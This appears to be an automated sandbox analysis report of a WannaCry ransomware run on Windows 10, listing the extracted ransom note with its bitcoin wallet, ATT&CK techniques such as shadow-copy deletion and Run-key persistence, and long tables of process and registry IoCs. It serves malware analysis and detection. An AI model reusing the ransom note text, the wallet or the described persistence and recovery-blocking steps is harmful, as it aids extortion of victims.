wannacry | hxxps://www[.]google[.]co[.]uk/?safe=active&ssui=on

Resubmissions

02-07-2024 08:51

240702-ksk5lsyemm 10

02-07-2024 08:04

240702-jyqrlstcke 6

Analysis

max time kernel
1799s
max time network
1783s
platform
windows10-1703_x64
resource
win10-20240611-en
resource tags

arch:x64arch:x86image:win10-20240611-enlocale:en-usos:windows10-1703-x64system
submitted
02-07-2024 08:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

https://www.google.co.uk/?safe=active&ssui=on

Score

10^/10

wannacry defense_evasion discovery execution impact persistence ransomware worm

Malware Config

Extracted

Path

C:\Users\Admin\Downloads\Ransomware.WannaCry\@[email protected]

Family

wannacry

Ransom Note

Q: What's wrong with my files? A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted. If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely! Let's start decrypting! Q: What do I do? A: First, you need to pay service fees for the decryption. Please send $300 worth of bitcoin to this bitcoin address: 13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94 Next, please find an application file named "@[email protected]". It is the decrypt software. Run and follow the instructions! (You may need to disable your antivirus for a while.) Q: How can I trust? A: Don't worry about decryption. We will decrypt your files surely because nobody will trust us if we cheat users. * If you need our assistance, send a message by clicking <Contact Us> on the decryptor window. �

Wallets

13AM4VW2dhxYgXeQepoHkHSQuy6NgaEb94

Signatures

Wannacry
WannaCry is a ransomware cryptoworm.
ransomware worm wannacry
Deletes shadow copies 3 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware defense_evasion impact execution

File Deletion
T1070.004

Inhibit System Recovery
T1490

Windows Management Instrumentation
T1047
Downloads MZ/PE file

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

@[email protected]

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\International\Geo\Nation	@[email protected]

Drops startup file 2 IoCs

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\~SD8E27.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
File opened for modification	C:\Users\Admin\AppData\Roaming\Microsoft\Word\STARTUP\~SD8E3D.tmp	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe

Executes dropped EXE 64 IoCs

Processes:

Mandela_1.0.0-alpha.exetaskdl.exe@[email protected]@[email protected]taskhsvc.exetaskse.exe@[email protected]taskdl.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exe@[email protected]taskse.exetaskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]taskdl.exetaskse.exe@[email protected]

pid	process
1528	Mandela_1.0.0-alpha.exe
2548	taskdl.exe
508	@[email protected]
3256	@[email protected]
3452	taskhsvc.exe
3556	taskse.exe
2876	@[email protected]
3872	taskdl.exe
4828	taskdl.exe
4440	taskse.exe
1400	@[email protected]
2764	taskdl.exe
2852	taskse.exe
3556	@[email protected]
4676	taskdl.exe
5000	@[email protected]
1940	taskse.exe
808	taskdl.exe
2140	taskse.exe
4572	@[email protected]
3460	taskdl.exe
2616	taskse.exe
2944	@[email protected]
1540	taskdl.exe
216	taskse.exe
4260	@[email protected]
3960	taskdl.exe
2032	taskse.exe
3564	@[email protected]
580	taskdl.exe
4808	taskse.exe
3344	@[email protected]
3776	taskdl.exe
4652	taskse.exe
1892	@[email protected]
1880	taskdl.exe
2320	taskse.exe
5048	@[email protected]
4368	taskse.exe
4208	@[email protected]
1756	taskdl.exe
2812	taskse.exe
5024	@[email protected]
5076	taskdl.exe
2300	taskse.exe
1596	@[email protected]
1940	taskdl.exe
4936	taskse.exe
4748	@[email protected]
3000	taskdl.exe
2208	taskse.exe
1968	@[email protected]
3672	taskdl.exe
2736	taskse.exe
2804	@[email protected]
2928	taskdl.exe
1300	taskse.exe
4292	@[email protected]
2548	taskdl.exe
2692	taskse.exe
1864	@[email protected]
3468	taskdl.exe
3040	taskse.exe
2196	@[email protected]

Loads dropped DLL 8 IoCs

Processes:

taskhsvc.exe

pid process

3452 taskhsvc.exe
3452 taskhsvc.exe
3452 taskhsvc.exe
3452 taskhsvc.exe
3452 taskhsvc.exe
3452 taskhsvc.exe
3452 taskhsvc.exe
3452 taskhsvc.exe
Modifies file permissions 1 TTPs 1 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exe

pid process

4208 icacls.exe

pid	process
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe
3452	taskhsvc.exe

pid	process
4208	icacls.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\wbaseltcdk426 = "\"C:\\Users\\Admin\\Downloads\\Ransomware.WannaCry\\tasksche.exe\""	reg.exe

File and Directory Permissions Modification: Windows File and Directory Permissions Modification 1 TTPs
defense_evasion

Windows File and Directory Permissions Modification
T1222.001
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

242 raw.githubusercontent.com
243 raw.githubusercontent.com

flow	ioc
242	raw.githubusercontent.com
243	raw.githubusercontent.com

Sets desktop wallpaper using registry 2 TTPs 2 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe@[email protected]

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]"	@[email protected]

Drops file in Windows directory 8 IoCs

Processes:

MicrosoftEdgeCP.exemspaint.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exe

description	ioc	process
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File opened for modification	C:\Windows\Debug\WIA\wiatrace.log	mspaint.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdgeCP.exe
File created	C:\Windows\rescache\_merged\3720402701\1568373884.pri	MicrosoftEdge.exe
File opened for modification	C:\Windows\Debug\ESE.TXT	MicrosoftEdge.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

chrome.exechrome.exe

description	ioc	process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe

Interacts with shadow copies 3 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
ransomware

File Deletion
T1070.004

Inhibit System Recovery
T1490

Direct Volume Access
T1006

Processes:

vssadmin.exe

pid process

2128 vssadmin.exe

pid	process
2128	vssadmin.exe

Modifies Internet Explorer settings 1 TTPs 3 IoCs

adware spyware

Modify Registry

T1112

Processes:

MicrosoftEdgeCP.exebrowser_broker.exebrowser_broker.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Main	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000\Software\Microsoft\Internet Explorer\Main	browser_broker.exe

Modifies data under HKEY_USERS 3 IoCs

Processes:

chrome.exechrome.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133643839403547551"	chrome.exe
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe

Modifies registry class 64 IoCs

Processes:

MicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdge.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exeMicrosoftEdgeCP.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Settings\Cache\Extensible Cache	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = b32587f35eccda01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\TreeView = "1"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Internet Settings\Zones\3\{AEBA21FA-782A-4A90-978D-B72164 = 1a3761592352350c7a5f20172f1e1a190e2b017313371312141a152a	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Packa = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OpenSearch\OpenSearchDescriptionData = baffc49ee383374a8abf67e99635ea1e0100000053b06a1abe27334898108231552c52911f0041002a00000065006e002e00770069006b006900700065006400690061002e006f007200670000001f00730064000000680074007400700073003a002f002f0065006e002e00770069006b006900700065006400690061002e006f00720067002f0077002f0072006500730074002e007000680070002f00760031002f0073006500610072006300680000001f00660026000000570069006b006900700065006400690061002000280065006e00290000001f0063000a000000000000000000	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingDelete\C:\Users\Admin\AppData\Local\Packa = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\DeviceId = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Explorer\Main	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-Revision = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DXFeatureLevel = "0"	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\Content\CachePrefix	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DataStore\LastCleanup = f9d878f35eccda01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-VendorId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy\Extensions	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Internet Explorer\Main	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\IECompatVersionLow = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-SubSysId = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\CIStatus	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\ACGStatus\DynamicCodePolicy = 05000000	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 628df01d5dccda01	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\ACGStatus\ACGPolicyState = "6"	MicrosoftEdgeCP.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\001\Internet Settings\Cache\History\CachePrefix = "Visited:"	MicrosoftEdgeCP.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\IETld\LowMic	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder\SyncIEFirstTimeFullScan = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\Wow64-DeviceId = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\CIStatusTimestamp = 2162271e5dccda01	MicrosoftEdge.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\GPU\AdapterInfo = "vendorId=\"0x10de\",deviceID=\"0x8c\",subSysID=\"0x0\",revision=\"0x0\",version=\"10.0.15063.0\"hypervisor=\"No Hypervisor (No SLAT)\""	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\BrowserEmulation\CVListDOSTime = "0"	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = 010000001cf5d2856e2f1d576e8cb5496151b701a46ec1a0e2d224cb1b7265df713093aa6421abaa95ca2fd9f05a2c868c4e893e3bc98d75bf183ffd112f	MicrosoftEdge.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\121\CIStatus\SignaturePolicy = 06000000	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\ReadingStorePending = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\FavOrder	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify = "1"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\CIStatus	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Main\DisallowDefaultBrowserPrompt = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\DummyPath\dummySetting = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\PendingRecovery\Active = "0"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Privacy\InProgressFlags = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Recovery\Active	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\004\Internet Explorer\Main\OperationalData = "1"	MicrosoftEdgeCP.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\CIStatus\EnablementState = "1"	MicrosoftEdge.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\ServiceUI\IsSignedIn = "0"	MicrosoftEdge.exe
Key created	\REGISTRY\USER\S-1-5-21-1453213197-474736321-1741884505-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\Children\006\CIStatus	MicrosoftEdgeCP.exe
